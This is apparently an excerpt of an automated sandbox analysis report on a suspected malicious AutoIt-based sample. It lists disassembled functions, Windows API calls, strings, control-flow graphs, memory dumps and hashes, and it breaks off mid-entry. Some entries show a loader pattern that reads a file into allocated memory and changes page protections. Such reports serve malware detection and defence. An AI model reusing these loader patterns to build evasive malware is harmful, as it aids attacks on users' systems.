1186 102b1d1-102b1d6 1184->1186 1187 102b205-102b20c 1185->1187 1186->1183 1188 102b1d8-102b1da 1186->1188 1189 102b230-102b260 VirtualProtect * 2 1187->1189 1190 102b20e-102b210 1187->1190 1191 102b1e3-102b1f0 GetProcAddress 1188->1191 1192 102b1dc-102b1e2 1188->1192 1195 102b264-102b268 1189->1195 1193 102b212-102b221 1190->1193 1194 102b223-102b22e 1190->1194 1196 102b1f2-102b1f7 1191->1196 1197 102b1f9 ExitProcess 1191->1197 1192->1191 1193->1187 1194->1193 1195->1195 1198 102b26a 1195->1198 1196->1186
                                    APIs
                                    • LoadLibraryA.KERNEL32(?), ref: 0102B1CA
                                    • GetProcAddress.KERNEL32(?,01024FF9), ref: 0102B1E8
                                    • ExitProcess.KERNEL32(?,01024FF9), ref: 0102B1F9
                                    • VirtualProtect.KERNELBASE(00F00000,00001000,00000004,?,00000000), ref: 0102B247
                                    • VirtualProtect.KERNELBASE(00F00000,00001000), ref: 0102B25C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
                                    • String ID:
                                    • API String ID: 1996367037-0
                                    • Opcode ID: 23541f9e59454a2d9e2887b6924b1b0ef772fcad5e6488aeae9571c2eb912020
                                    • Instruction ID: 5f4d6272e74d0fc4b2a544b72bba6bbd10862b839d76982040dd76fb357c5704
                                    • Opcode Fuzzy Hash: 23541f9e59454a2d9e2887b6924b1b0ef772fcad5e6488aeae9571c2eb912020
                                    • Instruction Fuzzy Hash: FA512A72A543725BD7229EBCDCC06B47BE4EB42220B6C0779DAF5C73C6E794580A8760
                                    Function 00F64696 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetFileAttributesW.KERNELBASE(?,00F3E7C1), ref: 00F646A6
                                    • FindFirstFileW.KERNELBASE(?,?), ref: 00F646B7
                                    • FindClose.KERNEL32(00000000), ref: 00F646C7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: FileFind$AttributesCloseFirst
                                    • String ID:
                                    • API String ID: 48322524-0
                                    • Opcode ID: c66466595e210e62346492bf4dda107b962ad1397df267cf70cf09d86fc11a7e
                                    • Instruction ID: 2810acd3f0f0295d139453f9916a31664f4ae6e80994d56f81d51a6498609bec
                                    • Opcode Fuzzy Hash: c66466595e210e62346492bf4dda107b962ad1397df267cf70cf09d86fc11a7e
                                    • Instruction Fuzzy Hash: 51E026328104046F8610B738EC4D8FABB9CDE46335F100726F836C24E0EBB0AD64A7DA
                                    Function 00F0E800 Relevance: 2.4, Strings: 1, Instructions: 1102COMMON
                                    Download Yara Rule
                                    Strings
                                    • Variable must be of type 'Object'., xrefs: 00F4428C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: Variable must be of type 'Object'.
                                    • API String ID: 0-109567571
                                    • Opcode ID: 267866ecdd66deb58269efce586a497e229f1f6adfe35ec879278309341ce6ea
                                    • Instruction ID: 87d706ce4754d32da90e1916aa5d6ff1d643c16a4b59176aa3142eb2d25477aa
                                    • Opcode Fuzzy Hash: 267866ecdd66deb58269efce586a497e229f1f6adfe35ec879278309341ce6ea
                                    • Instruction Fuzzy Hash: F0A28C75E04209CFCB24CF58C980BA9B7B1FF58320F648469E916AB391D735AD46FB81
                                    Function 00F10B30 Relevance: 57.3, APIs: 27, Strings: 5, Instructions: 1300windowsleeptimeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F10BBB
                                    • timeGetTime.WINMM ref: 00F10E76
                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F10FB3
                                    • TranslateMessage.USER32(?), ref: 00F10FC7
                                    • DispatchMessageW.USER32(?), ref: 00F10FD5
                                    • Sleep.KERNEL32(0000000A), ref: 00F10FDF
                                    • LockWindowUpdate.USER32(00000000,?,?), ref: 00F1105A
                                    • DestroyWindow.USER32 ref: 00F11066
                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00F11080
                                    • Sleep.KERNEL32(0000000A,?,?), ref: 00F452AD
                                    • TranslateMessage.USER32(?), ref: 00F4608A
                                    • DispatchMessageW.USER32(?), ref: 00F46098
                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00F460AC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Message$DispatchPeekSleepTranslateWindow$DestroyLockTimeUpdatetime
                                    • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                    • API String ID: 4003667617-3242690629
                                    • Opcode ID: ef52d74fbe476566e899b57737f8d856ce8af836ce7f5ca8d3b61e31633940c2
                                    • Instruction ID: 73599ec80493dfce8d9df4eb87de2d537697f9adbd92c5a984348c1db1acfc67
                                    • Opcode Fuzzy Hash: ef52d74fbe476566e899b57737f8d856ce8af836ce7f5ca8d3b61e31633940c2
                                    • Instruction Fuzzy Hash: 0BB2D471A08741DFD724EF24C885BAABBE4BF84714F14491DF84987292DB75E884FB82
                                    Function 00F693DF Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 00F691E9: __time64.LIBCMT ref: 00F691F3
                                      • Part of subcall function 00F05045: _fseek.LIBCMT ref: 00F0505D
                                    • __wsplitpath.LIBCMT ref: 00F694BE
                                      • Part of subcall function 00F2432E: __wsplitpath_helper.LIBCMT ref: 00F2436E
                                    • _wcscpy.LIBCMT ref: 00F694D1
                                    • _wcscat.LIBCMT ref: 00F694E4
                                    • __wsplitpath.LIBCMT ref: 00F69509
                                    • _wcscat.LIBCMT ref: 00F6951F
                                    • _wcscat.LIBCMT ref: 00F69532
                                      • Part of subcall function 00F6922F: _memmove.LIBCMT ref: 00F69268
                                      • Part of subcall function 00F6922F: _memmove.LIBCMT ref: 00F69277
                                    • _wcscmp.LIBCMT ref: 00F69479
                                      • Part of subcall function 00F699BE: _wcscmp.LIBCMT ref: 00F69AAE
                                      • Part of subcall function 00F699BE: _wcscmp.LIBCMT ref: 00F69AC1
                                    • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00F696DC
                                    • _wcsncpy.LIBCMT ref: 00F6974F
                                    • DeleteFileW.KERNEL32(?,?), ref: 00F69785
                                    • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00F6979B
                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00F697AC
                                    • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00F697BE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                    • String ID:
                                    • API String ID: 1500180987-0
                                    • Opcode ID: 92cfb0e6e7acfbd69f4bf960f5f81fd56c9d89c7b233230d112f401b658e6095
                                    • Instruction ID: 538caea13312ff3341ae0a12cb85e2e40bbb047452c6f237b6e71dc040581dd8
                                    • Opcode Fuzzy Hash: 92cfb0e6e7acfbd69f4bf960f5f81fd56c9d89c7b233230d112f401b658e6095
                                    • Instruction Fuzzy Hash: A5C14BB1D00229AECF21DF94CC85ADEB7BDEF45310F0040AAF609E7151DB749A84AF65
                                    Function 00F071EB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 00F04864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00FC62F8,?,00F037C0,?), ref: 00F04882
                                      • Part of subcall function 00F2074F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00F072C5), ref: 00F20771
                                    • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00F07308
                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00F3ECF1
                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00F3ED32
                                    • RegCloseKey.ADVAPI32(?), ref: 00F3ED70
                                    • _wcscat.LIBCMT ref: 00F3EDC9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                    • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                    • API String ID: 2673923337-2727554177
                                    • Opcode ID: 09616799c7a926800b6354c339456e11cb020408f68a3bffd3f1175cb21ef58f
                                    • Instruction ID: a4d20f4bb44f4af0251dd9f0bb8751428cc962eaf742506ae1633b41abec4cc2
                                    • Opcode Fuzzy Hash: 09616799c7a926800b6354c339456e11cb020408f68a3bffd3f1175cb21ef58f
                                    • Instruction Fuzzy Hash: 1A7147719093059EC714EF25ED829ABBBA8FF98750F40442EF445831A1EB749948FFA2
                                    Function 00F03A58 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                    • GetSysColorBrush.USER32(0000000F), ref: 00F03A62
                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00F03A71
                                    • LoadIconW.USER32(00000063), ref: 00F03A88
                                    • LoadIconW.USER32(000000A4), ref: 00F03A9A
                                    • LoadIconW.USER32(000000A2), ref: 00F03AAC
                                    • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00F03AD2
                                    • RegisterClassExW.USER32(?), ref: 00F03B28
                                      • Part of subcall function 00F03041: GetSysColorBrush.USER32(0000000F), ref: 00F03074
                                      • Part of subcall function 00F03041: RegisterClassExW.USER32(00000030), ref: 00F0309E
                                      • Part of subcall function 00F03041: RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00F030AF
                                      • Part of subcall function 00F03041: LoadIconW.USER32(000000A9), ref: 00F030F2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Load$Icon$Register$BrushClassColor$ClipboardCursorFormatImage
                                    • String ID: #$0$AutoIt v3
                                    • API String ID: 2880975755-4155596026
                                    • Opcode ID: 179505b090e3d6d752b754cfadc8e15bbc8eec3dd09c639cc27fc7bf484728c8
                                    • Instruction ID: af74beae2c24318cc3ea8c85a5fe263645b8c6ba853cc9cd9ad7409d9faf146e
                                    • Opcode Fuzzy Hash: 179505b090e3d6d752b754cfadc8e15bbc8eec3dd09c639cc27fc7bf484728c8
                                    • Instruction Fuzzy Hash: DE211971A04308AFEF109FA4EE0AFDD7BB4EB08711F10412AE504E72A0D3BA5654AF94
                                    Function 00F03778 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                    • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                                    • API String ID: 1825951767-3513169116
                                    • Opcode ID: 925a84af35994668d0acf97e4caff6c2c8646722738d033ea18e63eb1168186e
                                    • Instruction ID: 91d41c8c55c5eef7ef8eb8f29c1ceb647155aa931b4ffded8e7846312054feb3
                                    • Opcode Fuzzy Hash: 925a84af35994668d0acf97e4caff6c2c8646722738d033ea18e63eb1168186e
                                    • Instruction Fuzzy Hash: 75A13072D142299ACF04EBA0DC91EEEB77DBF14310F400529F512A71D1DB785A09FB61
                                    Function 00F03015 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 71registrywindowclipboardCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                    • GetSysColorBrush.USER32(0000000F), ref: 00F03074
                                    • RegisterClassExW.USER32(00000030), ref: 00F0309E
                                    • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00F030AF
                                    • LoadIconW.USER32(000000A9), ref: 00F030F2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Register$BrushClassClipboardColorFormatIconLoad
                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                    • API String ID: 975902462-1005189915
                                    • Opcode ID: 30dff5bee8d4cbbe8333498ecea34c5a4064d3cae0148f2863f5ccac93f522e5
                                    • Instruction ID: 8200f110c63d2beb1b865e184673a0dd1730a55023a088fd629a0936d77a2ef2
                                    • Opcode Fuzzy Hash: 30dff5bee8d4cbbe8333498ecea34c5a4064d3cae0148f2863f5ccac93f522e5
                                    • Instruction Fuzzy Hash: CE3138B1945309AFEB009FA4ED85ADDBBF0FF09310F10412AE590E62A0D7B94585EF51
                                    Function 00F03041 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 54registrywindowclipboardCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                    • GetSysColorBrush.USER32(0000000F), ref: 00F03074
                                    • RegisterClassExW.USER32(00000030), ref: 00F0309E
                                    • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00F030AF
                                    • LoadIconW.USER32(000000A9), ref: 00F030F2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Register$BrushClassClipboardColorFormatIconLoad
                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                    • API String ID: 975902462-1005189915
                                    • Opcode ID: dbb4e261d543ae06d9f3bd65bc011d17c12fa66d00d81c05782d5aea42ee5348
                                    • Instruction ID: f36cd995863702ac868f07a01949347603ec89c81146701feb4099e517c6c478
                                    • Opcode Fuzzy Hash: dbb4e261d543ae06d9f3bd65bc011d17c12fa66d00d81c05782d5aea42ee5348
                                    • Instruction Fuzzy Hash: B021A0B191521CAFEB009FA4ED8AADDBBF4FB08710F10412AE911E72A0D7B54548AF91
                                    Function 018E2670 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 948 18e2670-18e271e call 18e0000 951 18e2725-18e274b call 18e3580 CreateFileW 948->951 954 18e274d 951->954 955 18e2752-18e2762 951->955 956 18e289d-18e28a1 954->956 960 18e2769-18e2783 VirtualAlloc 955->960 961 18e2764 955->961 958 18e28e3-18e28e6 956->958 959 18e28a3-18e28a7 956->959 962 18e28e9-18e28f0 958->962 963 18e28a9-18e28ac 959->963 964 18e28b3-18e28b7 959->964 965 18e278a-18e27a1 ReadFile 960->965 966 18e2785 960->966 961->956 967 18e2945-18e295a 962->967 968 18e28f2-18e28fd 962->968 963->964 969 18e28b9-18e28c3 964->969 970 18e28c7-18e28cb 964->970 975 18e27a8-18e27e8 VirtualAlloc 965->975 976 18e27a3 965->976 966->956 971 18e295c-18e2967 VirtualFree 967->971 972 18e296a-18e2972 967->972 977 18e28ff 968->977 978 18e2901-18e290d 968->978 969->970 973 18e28cd-18e28d7 970->973 974 18e28db 970->974 971->972 973->974 974->958 979 18e27ef-18e280a call 18e37d0 975->979 980 18e27ea 975->980 976->956 977->967 981 18e290f-18e291f 978->981 982 18e2921-18e292d 978->982 988 18e2815-18e281f 979->988 980->956 984 18e2943 981->984 985 18e292f-18e2938 982->985 986 18e293a-18e2940 982->986 984->962 985->984 986->984 989 18e2852-18e2866 call 18e35e0 988->989 990 18e2821-18e2850 call 18e37d0 988->990 996 18e286a-18e286e 989->996 997 18e2868 989->997 990->988 998 18e287a-18e287e 996->998 999 18e2870-18e2874 FindCloseChangeNotification 996->999 997->956 1000 18e288e-18e2897 998->1000 1001 18e2880-18e288b VirtualFree 998->1001 999->998 1000->951 1000->956 1001->1000
                                    APIs
                                    • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 018E2741
                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 018E2967
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2081259592.00000000018E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_18e0000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: CreateFileFreeVirtual
                                    • String ID:
                                    • API String ID: 204039940-0
                                    • Opcode ID: 40a228ae330d8c6dccb3fb1644613726de4fc0fd5d5ec17983852815de9b42d5
                                    • Instruction ID: fb2dffdadebb5c4b587b5e4914df816c49bc1791fd31f78ccf758dc56ee4d0dc
                                    • Opcode Fuzzy Hash: 40a228ae330d8c6dccb3fb1644613726de4fc0fd5d5ec17983852815de9b42d5
                                    • Instruction Fuzzy Hash: 9EA12870E00219EBDB14DFA8C898BEEBBBAFF49304F208159E515BB280D7759A40CF55
                                    Function 00F039E7 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1069 f039e7-f03a57 CreateWindowExW * 2 ShowWindow * 2
                                    APIs
                                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00F03A15
                                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00F03A36
                                    • ShowWindow.USER32(00000000,?,?), ref: 00F03A4A
                                    • ShowWindow.USER32(00000000,?,?), ref: 00F03A53
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Window$CreateShow
                                    • String ID: AutoIt v3$edit
                                    • API String ID: 1584632944-3779509399
                                    • Opcode ID: c892027179fe437158f71ceac08939d0082f848c861af8282a4aecba30239bdb
                                    • Instruction ID: dffeb81e52ddf346d7801c4763aaed157a3fa56e5eed170a334c0ccbe3fe4937
                                    • Opcode Fuzzy Hash: c892027179fe437158f71ceac08939d0082f848c861af8282a4aecba30239bdb
                                    • Instruction Fuzzy Hash: 83F03A706042987EEF301723AC4AEB73E7DD7C7F50B00002AB900E3171C2B50841EAB0
                                    Function 018E2410 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 154fileCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
